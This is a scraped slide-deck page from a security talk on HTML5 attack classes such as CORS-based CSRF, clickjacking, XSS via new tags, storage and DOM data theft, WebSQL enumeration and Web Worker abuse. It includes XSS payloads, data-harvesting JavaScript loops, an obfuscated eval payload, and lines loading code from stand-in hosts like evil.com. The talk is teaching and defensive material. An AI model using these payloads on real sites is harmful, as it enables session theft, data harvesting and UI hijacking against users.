Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat12 core technologies you should learn, love, and hate to be a 'real' technocrat
12 core technologies you should learn, love, and hate to be a 'real' technocrat
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams Security
 

More from Blueinfy Solutions

More from Blueinfy Solutions (11)

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
 
Android attacks
Android attacksAndroid attacks
Android attacks
 
Automation In Android & iOS Application Review
Automation In Android & iOS Application Review�Automation In Android & iOS Application Review�
Automation In Android & iOS Application Review
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 

Recently uploaded

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
VictorSzoltysek
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 

Recently uploaded (20)

Navigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern EnterpriseNavigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern Enterprise
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
AI+A11Y 11MAY2024 HYDERBAD GAAD 2024 - HelloA11Y (11 May 2024)
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps Productivity
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Simplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptxSimplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptx
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 

HTML5 hacking

  • 2. API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 3. HTML5 – App Layers • Presentation – HTML5 (Tags & Events – new model) • Process & Logic – JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. • Network & Access – XHR – Level 2 – WebSockets – Plugin-Sockets • Core Policies – SOP – Sandboxing for iframe – CORS
  • 4. • CORS/SOP – Data transfer & Origin issues • Web Messaging – Cross Domain calls • Web Workers – Domain calls & Logic issues • LocalStorage – Information leakage & Identity • Web SQL – Offline & Data theft • UI/HTML5 – UI Redressing (mixed with CORS) • DOM/XHR – Several issues • APIs - Geo-Location, Sockets, Drag-Drop Abuse Threat Model & HTML5 Components
  • 5. Attacks - Stealth and Silent … A1 - CORS Attacks & CSRF A2 - ClickJacking, CORJacking and UI exploits A3 - XSS with HTML5 tags, attributes and events A4 - Web Storage and DOM information extraction A5 - SQLi & Blind Enumeration A6 - Web Messaging and Web Workers injections A7 - DOM based XSS with HTML5 & Messaging A8 - Third party/Offline HTML Widgets and Gadgets A9 - Web Sockets and Attacks A10 - Protocol/Schema/APIs attacks with HTML5 5
  • 6. API (Media, Geo etc.) & Messaging Plug-In A1 - CORS Attacks & CSRF HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 7. HTML5, CORS & XHR • Before HTML5 – XHR was possible to same origin only (SOP applicable) • HTML5 – allows cross origin calls with XHR- Level 2 calls • CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) • Adding extra HTTP header (Access-Control- Allow-Origin and few others) 7
  • 8. HTTP Headers • Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) • Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) 8
  • 9. • CSRF++ - powered by XHR-L2 • XML/JSON Cross Domain stream injection • CORS preflight bypass – content-type • Internal network scanning and tunneling • Information harvesting (internal crawling) • Stealth browser shell – post XSS (Allow origin- *) • Forcing cookie replay by “withCredentials” • Business functionality abuse (upload and streams) Stealth threats
  • 10. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Login request (HTTPS) Session cookie Client/Victim Browser User establishing Session
  • 11. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Placing an order (JSON services) Success Client/Victim Browser User making a buy over HTTP Browser using XHR Call JavaScript
  • 12. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Client/Victim Browser Session is still live – not yet logged out Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true
  • 14. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP buy request Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP request generated • Silent Exploitation takes place Got it
  • 16. • Powerful XHR-Level 2 call allows file upload on the fly. • Interestingly – possible to craft file through JavaScript and post on the server – if CSRF token is not there. • Example, your profile is having a photograph of yours and you visit attacker site that photo changes to something else • More serious threat, exploiting actual business functionalities... CSRF/Upload
  • 17. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server Uploading bulk orders Success Client/Victim Browser Business layer function of uploading Browser is having Form (multi-part)
  • 19. CSRF with XHR/HTML5 Authentication Server Database Server Web Store Application Server XHR initiates HTTP multi-part - Upload Success – cookie replayed Client/Victim Browser Attacker’s Site Visit Attacker’s page Attacker sends CSRF payload Hence, • Without victim’s consent or notice • Stealth HTTP Upload takes place • Silent Exploitation… Got it
  • 21. Internal Scan/Crawl for CORS • XHR2 – allows full internal scanning capacity • If internal resource is set to “*” for Access-Control- Allow-Origin – Game Over!!! • Attacker can craft a page for box behind firewall, visit the page – XHR gets loaded and start crawling internal information with back tunnel • Harvest and POST back to the server • All JavaScript – supported by all HTML5 browsers • Also can be mixed with timing attacks • Limited crawl – “withCredentials” will not work … 21
  • 22. Internal Scan/Crawl for CORS Internal Web/App Server Internal Web Mail Internal HR Application Client/Victim Browser Attacker’s Site InternetInternet IntranetIntranet CSRF Payload And stealth channel
  • 24. • Scan and look for – Content-Type checking on server side – CORS policy scan – Form and Upload with tokens or not • Defense and Countermeasures – Secure libraries for streaming HTML5/Web 2.0 content – CSRF protections – Stronger CORS implementation Scan and Defend
  • 25. API (Media, Geo etc.) & Messaging Plug-In A2 - ClickJacking, CORJacking and UI exploits HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 26. Click/COR-Jacking • UI Redressing (Click/Tab/Event Jacking) attack vectors are popular ways to abuse cross domain HTTP calls and events. • HTML5 and RIA applications are having various different resources like Flash files, Silverlight, video, audio etc. • If DOM is forced to change underlying resource on the fly and replaced by cross origin/domain resource then it causes Cross Origin Resource Jacking (CROJacking). 26
  • 27. • Iframe is having new attributed called sandbox • It allows frame isolation • Diabling JavaScript on cross domain while loading – bypassing frame bursting script – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin allow-scripts" height=“x" width=“x"> - Script will run… – <iframe src="http://192.168.100.21/" sandbox="allow-same-origin" height="500" width="500"> - script will not run – ClickJacking Sandbox – HTML5
  • 28. CORJacking • It is possible to have some integrated attacks – DOM based XSS – CSRF – Flash • DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.swf"
  • 29. CORJacking • Possible with other types of resources as well • Also, reverse CORJacking is a possible threat 29
  • 30. Double eval – eval the eval • Payload - document.getElementsByName('Login').ite m(0).src='http://192.168.100.200:8080/flex/ Loginn/Loginn.swf‘ • Converting for double eval to inject ‘ and “ etc… – eval(String.fromCharCode(100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,115,66,121,78, 97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101, 109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47 ,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,4 8,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111, 103,105,110,110,46,115,119,102,39))
  • 31. Similar with … • It is possible to have some integrated attacks – DOM based XSS – CSRF – Silvelight files • DOM based issue can change xap file – it can be changed at run time – user will not come to know .. • Example – document.getElementsByName(“login").item(0).src = "http://evil/login.xap"
  • 32. • Scan and look for – ClickJacking defense code scanning – Using X-FRAME-OPTIONS • Defense and Countermeasures – Better control on CORS – Creating self aware components and loading after checking the domain Scan and Defend
  • 33. API (Media, Geo etc.) & Messaging Plug-In A3 - XSS with HTML5 tags, attributes and events HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 34. HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 34
  • 35. HTML5 – XSS • Blacklist and filter will get bypassed • Lot of new signatures and possible ways to execute scripts • XSS can be injected from tags and events • New attributes are available for XSS payload 35
  • 36. XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 36
  • 37. XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 37
  • 38. XSS variants • MathML issues – <math href="javascript:alert(1)">CLICKME</math> – <math> <maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</ma ction> </math> 38
  • 39. XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … 39
  • 40. • Scan and look for – Reflected or Persistent XSS spots with HTML5 tags • Defense and Countermeasures – Have it added on your blacklist – Standard XSS protections by encoding Scan and Defend
  • 41. API (Media, Geo etc.) & Messaging Plug-In A4 - Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 42. Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 42
  • 43. Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
  • 44. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 44
  • 45. DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
  • 46. Password extraction from Ajax/DOM/HTML5 routine • Here is the line of code – temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function()
  • 47. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 47
  • 48. Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423 mjfdvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 48
  • 49. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 49
  • 50. • Scan and look for – Scanning storage • Defense and Countermeasures – Do not store sensitive information on localStorage and Globals – XSS protection Scan and Defend
  • 51. API (Media, Geo etc.) & Messaging Plug-In A5 - SQLi & Blind Enumeration HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 52. SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
  • 53. SQL Injection • Through JavaScript one can harvest entire local database. • Example
  • 54. Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 54
  • 55. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 55
  • 56. Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 56
  • 58. API (Media, Geo etc.) & Messaging Plug-In A6 - Web Messaging and Web Workers injections HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 59. Web Messaging • HTML5 is having new interframe communication system called Web Messaging. • By postMessage() call parent frame/domain can call with the iframe • Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible 59
  • 60. Web Messaging - Scenario • If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked • Also, origin is not set to fixed then again frame listen from any domian – again an issue • Stream coming needs to be checked before innerHTML or eval() • Iframe or Web Worker can glue two streams – same domain or cross domain 60
  • 61. Web Worker – Hacks! • Web Workers allows threading into HTML pages using JavaScript • No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers • Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); 61
  • 62. Web Worker – Hacks! 62 JavaScript Runtime Browser Platform Scope and Object – No DOM Access XHR, Location, Navigator etc. Regex, Array, JSON etc… Web Page Current DOM Background Thread on same page - messaging Web Worker
  • 63. Web Worker – Hacks! • Security issues – It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) – It has some typical issues • It allows the use of XHR. Hence, in-domain and CORS requests possible • It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though • Message validation needed – else DOM based XSS 63
  • 64. Web Worker – Hacks! • Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> 64
  • 65. Web Workers – Hacks! • Possible to cause XSS – Running script – Passing hidden payload • Also, web workers can help in embedding silent running js file and can be controlled. • Can be a tool for payload delivery and control within browser framework • importScripts("http://evil.com/payload.js") – worker can run cross domain script 65
  • 66. Web Worker – Hacks! 66
  • 67. • Scan and look for – JavaScript scanning – Messaging and Worker implementation • Defense and Countermeasures – Same origin listening is a must for messaging event Scan and Defend
  • 68. API (Media, Geo etc.) & Messaging Plug-In A7 - DOM based XSS with HTML5 & Messaging HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 70. DOM based XSS - Messaging • It is a sleeping giant in the Ajax applications coupled with Web Messaging • Root cause – DOM is already loaded – Application is single page and DOM remains same – New information coming needs to be injected in using various DOM calls like eval() – Information is coming from untrusted sources – JSONP usage – Web Workers and callbacks
  • 71. AJAX with HTML5 – DOM • Ajax function would be making a back-end call • Back-end would be returning JSON stream or any other and get injected in DOM • In some libraries their content type would allow them to get loaded in browser directly • In that case bypassing DOM processing…
  • 72. • Scan and look for – DOM calls – Use of eval(), document.* calls etc. • Defense and Countermeasures – Secure JavaScript coding Scan and Defend
  • 73. API (Media, Geo etc.) & Messaging Plug-In A8 - Third party/Offline HTML Widgets and Gadgets HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 74. Offline Apps • HTML5 supports caching pages for offline usage • <html manifest="/appcache.manifest"> • List of pages gets stored • Possible to attack and cache poisoning – Untrusted network or proxy can inject malicious script – When you get on to actual app that script gets executed and keep eye on your activities 74
  • 75. HTML5 Widgets • Widgets/Gadgets/Modules – popular with HTML5 applications • Small programs runs under browser and using Web Workers and Messaging • JavaScript and HTML based components • In some cases they share same DOM – Yes, same DOM • It can cause a cross widget channels and iframe/sandbox
  • 76. Cross DOM Access Widget 1 Email Widget DOM – Shared DOM Widget 2 RSS Feed Reader Widget 3 Attacker Setting the trap HTML5 – Web Messaging and Workers
  • 77. HTML5 - Traps • It is possible to access DOM events, variables, logic etc. • Sandbox is required at the architecture layer to protect cross widget access • Segregating DOM by iframe may help • Flash based widget is having its own issues as well • Code analysis of widgets before allowing them to load
  • 78. API (Media, Geo etc.) & Messaging Plug-In A9 - Web Sockets and Attacks HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 79. Web Sockets • HTML5 allows Web Socket APIs – full duplex TCP channel through JavaScript • Allows cross domain connection like CORS • Possible threats – Back door and browser shell – Quick port scanning – Botnet and malware can leverage (one to many connections) – Sniffer based on Web Socket 79
  • 80. Internal Scanning • Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. • Some browsers have blocked these calls for security reason.
  • 81. API (Media, Geo etc.) & Messaging Plug-In A10 - Protocol/Schema/APIs attacks with HTML5 HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  • 82. Custom protocol/schema • HTML5 allows custom protocol and schema registration • Example – navigator.registerProtocolHandler("mailto", "http://www.foo.com/?uri=%s", “My Mail"); • It is possible to abuse this feature in certain cases • Browser follows and gets registered for same domain though 82
  • 83. • HTML5 few other APIs are interesting from security standpoint – File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. – Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies … – Lot more to explore and defend… APIs …